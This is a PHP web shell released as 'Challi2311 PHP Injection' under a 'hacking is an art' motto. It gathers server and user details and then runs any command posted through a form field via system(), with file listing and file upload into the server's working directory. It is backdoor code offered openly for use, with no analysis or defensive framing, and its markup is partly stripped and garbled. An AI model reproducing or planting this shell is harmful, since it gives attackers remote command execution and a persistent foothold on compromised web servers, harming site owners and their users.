Everybody know their limits, you just got more than others.
Search in everymind, looking for knowledge. Hacking is an art.

# Challi2311 PHP Injection
# Released by : Ch W.G
$user = get_current_user( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
if(!$whoami)$whoami=exec("whoami");
?>
= $info ?> : = $value ?> |
User Info: uid== $login ?>(= $whoami?>) euid== $euid ?>(= $whoami?>) gid== $gid ?>(= $whoami?>) |
Current Path: = $chdir ?> |
Permission Directory: if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?> |
Server Services: = "$SERVER_SOFTWARE $SERVER_VERSION"; ?> |
Server Address: = "$SERVER_ADDR $SERVER_NAME"; ?> |
Script Current User: = $user ?> |
PHP Version: = $ver ?> |
set_magic_quotes_runtime(0);
$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;
if( $currentWD == "" ) {
$currentWD = $SCWD;
}
if( $_POST['_act'] == "List files!" ) {
$currentCMD = "ls -la";
}
print "
";
$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);
if( $_POST['_act'] == "Upload!" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print "
} else {
print "
";File uploaded successfully!
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
print "
}
} else {
print "\n\n\n
\n";\n\n\n
$currentCMD = "cd ".$currentWD.";".$currentCMD;
system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm
/tmp/cmdtemp");
print "\n
}
exit;
?>

